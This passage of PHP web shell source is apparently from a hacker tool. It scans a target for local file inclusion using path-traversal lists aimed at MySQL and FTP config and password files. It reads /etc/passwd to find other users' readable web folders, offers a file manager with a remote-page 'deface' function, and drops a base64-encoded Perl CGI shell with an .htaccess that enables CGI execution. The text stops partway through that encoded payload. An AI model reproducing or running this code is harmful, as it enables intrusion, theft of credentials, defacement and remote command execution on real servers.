  1129.                 5 => "../../../../../../../../../../../../../../../var/log/mysql/mysql-slow.log".$byte1."",
  1130.                 6 => "../../../../../../../../../../../../../../../var/mysql.log".$byte1."",
  1131.                 7 => "../../../../../../../../../../../../../../../var/lib/mysql/my.cnf".$byte1."",
  1132.                 8 => "../../../../../../../../../../../../../../../etc/mysql/my.cnf".$byte1."",
  1133.                 9 => "../../../../../../../../../../../../../../../var/log/mysqld.log".$byte1."",
  1134.                 10 => "../../../../../../../../../../../../../../../etc/my.cnf".$byte1."");
  1135.            
  1136.               $lfiftp = array(
  1137.                 1 => "../../../../../../../../../../../../../../../etc/logrotate.d/proftpd".$byte1."",
  1138.                 2 => "../../../../../../../../../../../../../../../www/logs/proftpd.system.log".$byte1."",
  1139.                 3 => "../../../../../../../../../../../../../../../var/log/proftpd".$byte1."",
  1140.                 4 => "../../../../../../../../../../../../../../../etc/proftp.conf".$byte1."",
  1141.                 5 => "../../../../../../../../../../../../../../../etc/protpd/proftpd.conf".$byte1."",
  1142.                 6 => "../../../../../../../../../../../../../../../etc/vhcs2/proftpd/proftpd.conf".$byte1."",
  1143.                 7 => "../../../../../../../../../../../../../../../etc/proftpd/modules.conf".$byte1."",
  1144.                 8 => "../../../../../../../../../../../../../../../var/log/vsftpd.log".$byte1."",
  1145.                 9 => "../../../../../../../../../../../../../../../etc/vsftpd.chroot_list".$byte1."",
  1146.                 10 => "../../../../../../../../../../../../../../../etc/logrotate.d/vsftpd.log".$byte1."",
  1147.                 11 => "../../../../../../../../../../../../../../../etc/vsftpd/vsftpd.conf".$byte1."",
  1148.                 12 => "../../../../../../../../../../../../../../../etc/vsftpd.conf".$byte1."",
  1149.                 13 => "../../../../../../../../../../../../../../../etc/chrootUsers".$byte1."",
  1150.                 14 => "../../../../../../../../../../../../../../../var/log/xferlog".$byte1."",
  1151.                 15 => "../../../../../../../../../../../../../../../var/adm/log/xferlog".$byte1."",
  1152.                 16 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftpaccess".$byte1."",
  1153.                 17 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftphosts".$byte1."",
  1154.                 18 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftpusers".$byte1."",
  1155.                 19 => "../../../../../../../../../../../../../../../usr/sbin/pure-config.pl".$byte1."",
  1156.                 20 => "../../../../../../../../../../../../../../../usr/etc/pure-ftpd.conf".$byte1."",
  1157.                 21 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pure-ftpd.conf".$byte1."",
  1158.                 22 => "../../../../../../../../../../../../../../../usr/local/etc/pure-ftpd.conf".$byte1."",
  1159.                 23 => "../../../../../../../../../../../../../../../usr/local/etc/pureftpd.pdb".$byte1."",
  1160.                 24 => "../../../../../../../../../../../../../../../usr/local/pureftpd/etc/pureftpd.pdb".$byte1."",
  1161.                 25 => "../../../../../../../../../../../../../../../usr/local/pureftpd/sbin/pure-config.pl".$byte1."",
  1162.                 26 => "../../../../../../../../../../../../../../../usr/local/pureftpd/etc/pure-ftpd.conf".$byte1."",
  1163.                 27 => "../../../../../../../../../../../../../../../etc/pure-ftpd.conf".$byte1."",
  1164.                 28 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pure-ftpd.pdb".$byte1."",
  1165.                 29 => "../../../../../../../../../../../../../../../etc/pureftpd.pdb".$byte1."",
  1166.                 30 => "../../../../../../../../../../../../../../../etc/pureftpd.passwd".$byte1."",
  1167.                 31 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pureftpd.pdb".$byte1."",
  1168.                 32 => "../../../../../../../../../../../../../../../usr/ports/ftp/pure-ftpd/".$byte1."",
  1169.                 33 => "../../../../../../../../../../../../../../../usr/ports/net/pure-ftpd/".$byte1."",
  1170.                 34 => "../../../../../../../../../../../../../../../usr/pkgsrc/net/pureftpd/".$byte1."",
  1171.                 35 => "../../../../../../../../../../../../../../../usr/ports/contrib/pure-ftpd/".$byte1."",
  1172.                 36 => "../../../../../../../../../../../../../../../var/log/pure-ftpd/pure-ftpd.log".$byte1."",
  1173.                 37 => "../../../../../../../../../../../../../../../logs/pure-ftpd.log".$byte1."",
  1174.                 38 => "../../../../../../../../../../../../../../../var/log/pureftpd.log".$byte1."",
  1175.                 39 => "../../../../../../../../../../../../../../../var/log/ftp-proxy/ftp-proxy.log".$byte1."",
  1176.                 40 => "../../../../../../../../../../../../../../../var/log/ftp-proxy".$byte1."",
  1177.                 41 => "../../../../../../../../../../../../../../../var/log/ftplog".$byte1."",
  1178.                 42 => "../../../../../../../../../../../../../../../etc/logrotate.d/ftp".$byte1."",
  1179.                 43 => "../../../../../../../../../../../../../../../etc/ftpchroot".$byte1."",
  1180.                 44 => "../../../../../../../../../../../../../../../etc/ftphosts".$byte1."");
  1181.            
  1182.      
  1183.              $x = 1;
  1184.              if ( $type == 1 ) {
  1185.                 $res1 = FetchURL($target.$lfitest);
  1186.                 $res2 = FetchURL($target.$lfitest2);
  1187.                 $rhash1 = md5($res1);
  1188.                 $rhash2 = md5($res2);
  1189.                 if ($rhash1 != $rhash2) {
  1190.                     print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br  />";
  1191.                 while($lfiaccess[$x]) {
  1192.                     $res3 = FetchURL($target.$lfiaccess[$x]);
  1193.                     $rhash3 = md5($res3);
  1194.                     if ($rhash3 != $rhash2) {
  1195.                     print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiaccess[$x]."\">".$target."".$lfiaccess[$x]."</a><br  />";
  1196.                     }
  1197.                     else {            
  1198.                                   print "<font color='red'>[!] Failed!</font>".$target."".$lfiaccess[$x]."<br  />";
  1199.                     }
  1200.                     $x++;
  1201.           }
  1202.           }
  1203.              }
  1204.              if ( $type == 2 ) {
  1205.                 $res1 = FetchURL($target.$lfitest);
  1206.                 $res2 = FetchURL($target.$lfitest2);
  1207.                 $rhash1 = md5($res1);
  1208.                 $rhash2 = md5($res2);
  1209.                 if ($rhash1 != $rhash2) {
  1210.                     print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br  />";
  1211.                 while($lficonfig[$x]) {
  1212.                     $res3 = FetchURL($target.$lficonfig[$x]);
  1213.                     $rhash3 = md5($res3);
  1214.                     if ($rhash3 != $rhash2) {
  1215.                     print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lficonfig[$x]."\">".$target."".$lficonfig[$x]."</a><br  />";
  1216.                     }
  1217.                     else {            
  1218.                                   print "<font color='red'>[!] Failed!</font>".$target."".$lficonfig[$x]."<br  />";
  1219.                     }
  1220.                     $x++;
  1221.           }
  1222.           }
  1223.              }
  1224.              if ( $type == 3 ) {
  1225.                 $res1 = FetchURL($target.$lfitest);
  1226.                 $res2 = FetchURL($target.$lfitest2);
  1227.                 $rhash1 = md5($res1);
  1228.                 $rhash2 = md5($res2);
  1229.                 if ($rhash1 != $rhash2) {
  1230.                     print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br  />";
  1231.                 while($lfierror[$x]) {
  1232.                     $res3 = FetchURL($target.$lfierror[$x]);
  1233.                     $rhash3 = md5($res3);
  1234.                     if ($rhash3 != $rhash2) {
  1235.                     print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfierror[$x]."\">".$target."".$lfierror[$x]."</a><br  />";
  1236.                     }
  1237.                     else {            
  1238.                                   print "<font color='red'>[!] Failed!</font>".$target."".$lfierror[$x]."<br  />";
  1239.                     }
  1240.                     $x++;
  1241.           }
  1242.           }
  1243.              }
  1244.              if ( $type == 4 ) {
  1245.                 $res1 = FetchURL($target.$lfitest);
  1246.                 $res2 = FetchURL($target.$lfitest2);
  1247.                 $rhash1 = md5($res1);
  1248.                 $rhash2 = md5($res2);
  1249.                 if ($rhash1 != $rhash2) {
  1250.                     print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br  />";
  1251.                 while($lfiphpini[$x]) {
  1252.                     $res3 = FetchURL($target.$lfiphpini[$x]);
  1253.                     $rhash3 = md5($res3);
  1254.                     if ($rhash3 != $rhash2) {
  1255.                     print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiphpini[$x]."\">".$target."".$lfiphpini[$x]."</a><br  />";
  1256.                     }
  1257.                     else {            
  1258.                                   print "<font color='red'>[!] Failed!</font>".$target."".$lfiphpini[$x]."<br  />";
  1259.                     }
  1260.                     $x++;
  1261.           }
  1262.           }
  1263.              }
  1264.              if ( $type == 5 ) {
  1265.                 $res1 = FetchURL($target.$lfitest);
  1266.                 $res2 = FetchURL($target.$lfitest2);
  1267.                 $rhash1 = md5($res1);
  1268.                 $rhash2 = md5($res2);
  1269.                 if ($rhash1 != $rhash2) {
  1270.                     print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br  />";
  1271.                 while($lfimysql[$x]) {
  1272.                     $res3 = FetchURL($target.$lfimysql[$x]);
  1273.                     $rhash3 = md5($res3);
  1274.                     if ($rhash3 != $rhash2) {
  1275.                     print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfimysql[$x]."\">".$target."".$lfimysql[$x]."</a><br  />";
  1276.                     }
  1277.                     else {            
  1278.                                   print "<font color='red'>[!] Failed!</font>".$target."".$lfimysql[$x]."<br  />";
  1279.                     }
  1280.                     $x++;
  1281.           }
  1282.           }
  1283.              }
  1284.              if ( $type == 6 ) {
  1285.                 $res1 = FetchURL($target.$lfitest);
  1286.                 $res2 = FetchURL($target.$lfitest2);
  1287.                 $rhash1 = md5($res1);
  1288.                 $rhash2 = md5($res2);
  1289.                 if ($rhash1 != $rhash2) {
  1290.                     print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br  />";
  1291.                 while($lfiftp[$x]) {
  1292.                     $res3 = FetchURL($target.$lfiftp[$x]);
  1293.                     $rhash3 = md5($res3);
  1294.                     if ($rhash3 != $rhash2) {
  1295.                     print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiftp[$x]."\">".$target."".$lfiftp[$x]."</a><br  />";
  1296.                     }
  1297.                     else {            
  1298.                                   print "<font color='red'>[!] Failed!</font>".$target."".$lfiftp[$x]."<br  />";
  1299.                     }
  1300.                     $x++;
  1301.           }
  1302.           }
  1303.              }
  1304.     if ( $type == 7 ) {
  1305.                 $res1 = FetchURL($target.$lfitest);
  1306.                 $res2 = FetchURL($target.$lfitest2);
  1307.                 $rhash1 = md5($res1);
  1308.                 $rhash2 = md5($res2);
  1309.                 if ($rhash1 != $rhash2) {
  1310.                     print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br  />";{
  1311.                     $res3 = FetchURL($target.$lfiprocenv);
  1312.                     $rhash3 = md5($res3);
  1313.                     if ($rhash3 != $rhash2) {
  1314.                     print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiprocenv."\">".$target."".$lfiprocenv."</a><br  />";
  1315.                     }
  1316.                     else {            
  1317.                                   print "<font color='red'>[!] Failed!</font>".$target."".$lfiprocenv."<br  />";
  1318.                     }
  1319.           }
  1320.           }
  1321.              }
  1322.           }
  1323.     printFooter();
  1324.     }
  1325.    
  1326. function actionReadable() {
  1327.     printHeader();
  1328.     echo '<h1>Readable Dirs</h1>';
  1329.     echo '<div class="content">';
  1330.     $sm = ini_get('safe_mode');
  1331.     if($sm) {
  1332.         echo '<br /><b>Error: safe_mode = on</b><br /><br />';
  1333.     } else {
  1334.         @$passwd = file('/etc/passwd','r');
  1335.         if (!$passwd) {
  1336.             echo '<br /><b>[-] Error : coudn`t read /etc/passwd</b><br /><br />';
  1337.         } else {
  1338.             $pub = array();
  1339.             $users = array();
  1340.             $conf = array();
  1341.             $i = 0;
  1342.             foreach($passwd as $p) {
  1343.                 $r = explode(':',$p);
  1344.                 $dirz = $r[5].'/public_html/';
  1345.                 if(strpos($r[5],'home')) {
  1346.                     array_push($users,$r[0]);
  1347.                     if (is_readable($dirz)) {
  1348.                         array_push($pub,$dirz);
  1349.                     }
  1350.                 }
  1351.             }
  1352.             echo '<br><br>';
  1353.             echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n"."<br />";
  1354.             echo "[+] Founded ".sizeof($pub)." readable public_html directories\n"."<br /><br /><br />";
  1355.             foreach ($pub as $user) {
  1356.                 echo $user."<br>";
  1357.             }
  1358.             echo "<br /><br /><br />[+] Complete...\n"."<br />";
  1359.         }
  1360.     }
  1361.     echo '</div>';
  1362.     printFooter();    
  1363. }  
  1364.  
  1365. function actionFilesMan() {
  1366.     printHeader();
  1367.     echo '<h1>File manager</h1><div class=content>';
  1368.     if(isset($_POST['p1']) && $_POST['p1']!='deface') {
  1369.         switch($_POST['p1']) {
  1370.             case 'uploadFile':
  1371.                 if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
  1372.                     echo "Can't upload file!";
  1373.                 break;
  1374.                 break;
  1375.             case 'mkdir':
  1376.                 if(!@mkdir($_POST['p2']))
  1377.                     echo "Can't create new dir";
  1378.                 break;
  1379.             case 'delete':
  1380.                 function deleteDir($path) {
  1381.                     $path = (substr($path,-1)=='/') ? $path:$path.'/';
  1382.                     $dh  = opendir($path);
  1383.                     while ( ($item = readdir($dh) ) !== false) {
  1384.                         $item = $path.$item;
  1385.                         if ( (basename($item) == "..") || (basename($item) == ".") )
  1386.                             continue;
  1387.                         $type = filetype($item);
  1388.                         if ($type == "dir")
  1389.                             deleteDir($item);
  1390.                         else
  1391.                             @unlink($item);
  1392.                     }
  1393.                     closedir($dh);
  1394.                     rmdir($path);
  1395.                 }
  1396.                 if(is_array(@$_POST['f']))
  1397.                     foreach($_POST['f'] as $f) {
  1398.                         $f = urldecode($f);
  1399.                         if(is_dir($f))
  1400.                             deleteDir($f);
  1401.                         else
  1402.                             @unlink($f);
  1403.                     }
  1404.                 break;
  1405.             case 'paste':
  1406.                 if($_SESSION['act'] == 'copy') {
  1407.                     function copy_paste($c,$s,$d){
  1408.                         if(is_dir($c.$s)){
  1409.                             mkdir($d.$s);
  1410.                             $h = opendir($c.$s);
  1411.                             while (($f = readdir($h)) !== false)
  1412.                                 if (($f != ".") and ($f != "..")) {
  1413.                                     copy_paste($c.$s.'/',$f, $d.$s.'/');
  1414.                                 }
  1415.                         } elseif(is_file($c.$s)) {
  1416.                             @copy($c.$s, $d.$s);
  1417.                         }
  1418.                     }
  1419.                     foreach($_SESSION['f'] as $f)
  1420.                         copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']);                    
  1421.                 } elseif($_SESSION['act'] == 'move') {
  1422.                     function move_paste($c,$s,$d){
  1423.                         if(is_dir($c.$s)){
  1424.                             mkdir($d.$s);
  1425.                             $h = opendir($c.$s);
  1426.                             while (($f = readdir($h)) !== false)
  1427.                                 if (($f != ".") and ($f != "..")) {
  1428.                                     copy_paste($c.$s.'/',$f, $d.$s.'/');
  1429.                                 }
  1430.                         } elseif(is_file($c.$s)) {
  1431.                             @copy($c.$s, $d.$s);
  1432.                         }
  1433.                     }
  1434.                     foreach($_SESSION['f'] as $f)
  1435.                         @rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f);
  1436.                 }
  1437.                 unset($_SESSION['f']);
  1438.                 break;
  1439.             default:
  1440.                 if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) {
  1441.                     $_SESSION['act'] = @$_POST['p1'];
  1442.                     $_SESSION['f'] = @$_POST['f'];
  1443.                     foreach($_SESSION['f'] as $k => $f)
  1444.                         $_SESSION['f'][$k] = urldecode($f);
  1445.                     $_SESSION['cwd'] = @$_POST['c'];
  1446.                 }
  1447.                 break;
  1448.         }
  1449.         echo '<script>document.mf.p1.value="";document.mf.p2.value="";</script>';
  1450.     }
  1451.     if(isset($_POST['p1']) && $_POST['p1']=='deface') {
  1452.         $def = file_get_contents(''); //DEFACE LINK HERE
  1453.         file_put_contents($_POST['c'].$_POST['p2'],$def);
  1454.     }
  1455.     $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
  1456.     if($dirContent === false) {    echo 'Can\'t open this folder!'; return;    }
  1457.     global $sort;
  1458.     $sort = array('name', 1);
  1459.     if(!empty($_POST['p1'])) {
  1460.         if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
  1461.             $sort = array($match[1], (int)$match[2]);
  1462.     }
  1463.     echo '<script>
  1464.         function sa() {
  1465.             for(i=0;i<document.files.elements.length;i++)
  1466.             if(document.files.elements[i].type == \'checkbox\')
  1467.                 document.files.elements[i].checked = document.files.elements[0].checked;
  1468.         }
  1469.         </script>
  1470.         <table width=\'100%\' class=\'main\' cellspacing=\'0\' cellpadding=\'2\'>
  1471.         <form name=files method=post>';
  1472.     echo "<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
  1473.     $dirs = $files = $links = array();
  1474.     $n = count($dirContent);
  1475.     for($i=0;$i<$n;$i++) {
  1476.         $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
  1477.         $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
  1478.         $tmp = array('name' => $dirContent[$i],
  1479.                      'path' => $GLOBALS['cwd'].$dirContent[$i],
  1480.                      'modify' => @date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])),
  1481.                      'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]),
  1482.                      'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
  1483.                      'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
  1484.                      'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
  1485.                     );
  1486.         if(@is_file($GLOBALS['cwd'].$dirContent[$i]))
  1487.             $files[] = array_merge($tmp, array('type' => 'file'));
  1488.         elseif(@is_link($GLOBALS['cwd'].$dirContent[$i]))
  1489.             $links[] = array_merge($tmp, array('type' => 'link'));
  1490.         elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != "."))
  1491.             $dirs[] = array_merge($tmp, array('type' => 'dir'));
  1492.     }
  1493.     $GLOBALS['sort'] = $sort;
  1494.     function cmp($a, $b) {
  1495.         if($GLOBALS['sort'][0] != 'size')
  1496.             return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1);
  1497.         else
  1498.             return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
  1499.     }
  1500.     usort($files, "cmp");
  1501.     usort($dirs, "cmp");
  1502.     usort($links, "cmp");
  1503.     $files = array_merge($dirs, $links, $files);
  1504.     $l = 0;
  1505.     foreach($files as $f) {
  1506.         echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');"><b>[ '.htmlspecialchars($f['name']).' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
  1507.             .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
  1508.         $l = $l?0:1;
  1509.     }
  1510.     echo '<tr><td colspan=5>
  1511.     <input type=hidden name=a value=\'FilesMan\'>
  1512.     <input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">
  1513.     <input type=hidden name=charset value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
  1514.     <select name=\'p1\'><option value=\'copy\'>Copy</option><option value=\'move\'>Move</option><option value=\'delete\'>Delete</option>';
  1515.     if(!empty($_SESSION['act'])&&@count($_SESSION['f'])){echo '<option value=\'paste\'>Paste</option>'; }
  1516.     echo '</select>&nbsp;<input type="submit" value=">>"></td><td colspan="2" align="right" width="1"><input name="def" id="def" value="index.html" size="10"/>&nbsp;<input type="button" onclick="g(\'FilesMan\',\''.htmlspecialchars($GLOBALS['cwd']).'\',\'deface\',document.getElementById(\'def\').value)" value="Add Deface Here"></td></tr>
  1517.     </form></table></div>';
  1518.     printFooter();
  1519. }
  1520.  
  1521.  
  1522. function actionCgiShell() {
  1523.                                                                     printHeader();
  1524.                                                                     echo '<h1>Cgi telnet Evil here </h1><div class=content>';
  1525.                                                                     mkdir('cgitelnet1', 0755);
  1526.                                                                     chdir('cgitelnet1');
  1527.                                                                     $kokdosya = ".htaccess";
  1528.                                                                     $dosya_adi = "$kokdosya";
  1529.                                                                     $dosya = fopen($dosya_adi, 'w') or die("Dosya a&#231;&#305;lamad&#305;!");
  1530.                                                                     $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
  1531.  
  1532. AddType application/x-httpd-cgi .cin
  1533.  
  1534. AddHandler cgi-script .cin
  1535. AddHandler cgi-script .cin";
  1536.                                                                     fwrite($dosya, $metin);
  1537.                                                                     fclose($dosya);
  1538.                                                                     $cgishellizocin = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWFpbg0KIy0tLS0tLS0tLS0tLS0tLS0t
  1539. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1540. LS0tLQ0KIyA8YiBzdHlsZT0iY29sb3I6YmxhY2s7YmFja2dyb3VuZC1jb2xvcjojZmZmZjY2Ij5w
  1541. cml2OCBjZ2kgc2hlbGw8L2I+ICMgc2VydmVyDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1542. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQoNCiMt
  1543. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1544. LS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgQ29uZmlndXJhdGlvbjogWW91IG5lZWQgdG8gY2hhbmdl
  1545. IG9ubHkgJFBhc3N3b3JkIGFuZCAkV2luTlQuIFRoZSBvdGhlcg0KIyB2YWx1ZXMgc2hvdWxkIHdv
  1546. cmsgZmluZSBmb3IgbW9zdCBzeXN0ZW1zLg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1547. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KJFBhc3N3
  1548. b3JkID0gInByaXY4IjsJCSMgQ2hhbmdlIHRoaXMuIFlvdSB3aWxsIG5lZWQgdG8gZW50ZXIgdGhp
  1549. cw0KCQkJCSMgdG8gbG9naW4uDQoNCiRXaW5OVCA9IDA7CQkJIyBZb3UgbmVlZCB0byBjaGFuZ2Ug
  1550. dGhlIHZhbHVlIG9mIHRoaXMgdG8gMSBpZg0KCQkJCSMgeW91J3JlIHJ1bm5pbmcgdGhpcyBzY3Jp
  1551. cHQgb24gYSBXaW5kb3dzIE5UDQoJCQkJIyBtYWNoaW5lLiBJZiB5b3UncmUgcnVubmluZyBpdCBv
  1552. biBVbml4LCB5b3UNCgkJCQkjIGNhbiBsZWF2ZSB0aGUgdmFsdWUgYXMgaXQgaXMuDQoNCiROVENt
  1553. ZFNlcCA9ICImIjsJCSMgVGhpcyBjaGFyYWN0ZXIgaXMgdXNlZCB0byBzZXBlcmF0ZSAyIGNvbW1h
  1554. bmRzDQoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBXaW5kb3dzIE5ULg0KDQokVW5peENtZFNl
  1555. cCA9ICI7IjsJCSMgVGhpcyBjaGFyYWN0ZXIgaXMgdXNlZCB0byBzZXBlcmF0ZSAyIGNvbW1hbmRz
  1556. DQoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBVbml4Lg0KDQokQ29tbWFuZFRpbWVvdXREdXJh
  1557. dGlvbiA9IDEwOwkjIFRpbWUgaW4gc2Vjb25kcyBhZnRlciBjb21tYW5kcyB3aWxsIGJlIGtpbGxl
  1558. ZA0KCQkJCSMgRG9uJ3Qgc2V0IHRoaXMgdG8gYSB2ZXJ5IGxhcmdlIHZhbHVlLiBUaGlzIGlzDQoJ
  1559. CQkJIyB1c2VmdWwgZm9yIGNvbW1hbmRzIHRoYXQgbWF5IGhhbmcgb3IgdGhhdA0KCQkJCSMgdGFr
  1560. ZSB2ZXJ5IGxvbmcgdG8gZXhlY3V0ZSwgbGlrZSAiZmluZCAvIi4NCgkJCQkjIFRoaXMgaXMgdmFs
  1561. aWQgb25seSBvbiBVbml4IHNlcnZlcnMuIEl0IGlzDQoJCQkJIyBpZ25vcmVkIG9uIE5UIFNlcnZl
  1562. cnMuDQoNCiRTaG93RHluYW1pY091dHB1dCA9IDE7CQkjIElmIHRoaXMgaXMgMSwgdGhlbiBkYXRh
  1563. IGlzIHNlbnQgdG8gdGhlDQoJCQkJIyBicm93c2VyIGFzIHNvb24gYXMgaXQgaXMgb3V0cHV0LCBv
  1564. dGhlcndpc2UNCgkJCQkjIGl0IGlzIGJ1ZmZlcmVkIGFuZCBzZW5kIHdoZW4gdGhlIGNvbW1hbmQN
  1565. CgkJCQkjIGNvbXBsZXRlcy4gVGhpcyBpcyB1c2VmdWwgZm9yIGNvbW1hbmRzIGxpa2UNCgkJCQkj
  1566. IHBpbmcsIHNvIHRoYXQgeW91IGNhbiBzZWUgdGhlIG91dHB1dCBhcyBpdA0KCQkJCSMgaXMgYmVp
  1567. bmcgZ2VuZXJhdGVkLg0KDQojIERPTidUIENIQU5HRSBBTllUSElORyBCRUxPVyBUSElTIExJTkUg
  1568. VU5MRVNTIFlPVSBLTk9XIFdIQVQgWU9VJ1JFIERPSU5HICEhDQoNCiRDbWRTZXAgPSAoJFdpbk5U
  1569. ID8gJE5UQ21kU2VwIDogJFVuaXhDbWRTZXApOw0KJENtZFB3ZCA9ICgkV2luTlQgPyAiY2QiIDog
  1570. InB3ZCIpOw0KJFBhdGhTZXAgPSAoJFdpbk5UID8gIlxcIiA6ICIvIik7DQokUmVkaXJlY3RvciA9
  1571. ICgkV2luTlQgPyAiIDI+JjEgMT4mMiIgOiAiIDE+JjEgMj4mMSIpOw0KDQojLS0tLS0tLS0tLS0t
  1572. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1573. LS0tLS0tLS0tDQojIFJlYWRzIHRoZSBpbnB1dCBzZW50IGJ5IHRoZSBicm93c2VyIGFuZCBwYXJz
  1574. ZXMgdGhlIGlucHV0IHZhcmlhYmxlcy4gSXQNCiMgcGFyc2VzIEdFVCwgUE9TVCBhbmQgbXVsdGlw
  1575. YXJ0L2Zvcm0tZGF0YSB0aGF0IGlzIHVzZWQgZm9yIHVwbG9hZGluZyBmaWxlcy4NCiMgVGhlIGZp
  1576. bGVuYW1lIGlzIHN0b3JlZCBpbiAkaW57J2YnfSBhbmQgdGhlIGRhdGEgaXMgc3RvcmVkIGluICRp
  1577. bnsnZmlsZWRhdGEnfS4NCiMgT3RoZXIgdmFyaWFibGVzIGNhbiBiZSBhY2Nlc3NlZCB1c2luZyAk
  1578. aW57J3Zhcid9LCB3aGVyZSB2YXIgaXMgdGhlIG5hbWUgb2YNCiMgdGhlIHZhcmlhYmxlLiBOb3Rl
  1579. OiBNb3N0IG9mIHRoZSBjb2RlIGluIHRoaXMgZnVuY3Rpb24gaXMgdGFrZW4gZnJvbSBvdGhlciBD
  1580. R0kNCiMgc2NyaXB0cy4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1581. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBSZWFkUGFyc2UgDQp7
  1582. DQoJbG9jYWwgKCppbikgPSBAXyBpZiBAXzsNCglsb2NhbCAoJGksICRsb2MsICRrZXksICR2YWwp
  1583. Ow0KCQ0KCSRNdWx0aXBhcnRGb3JtRGF0YSA9ICRFTlZ7J0NPTlRFTlRfVFlQRSd9ID1+IC9tdWx0
  1584. aXBhcnRcL2Zvcm0tZGF0YTsgYm91bmRhcnk9KC4rKSQvOw0KDQoJaWYoJEVOVnsnUkVRVUVTVF9N
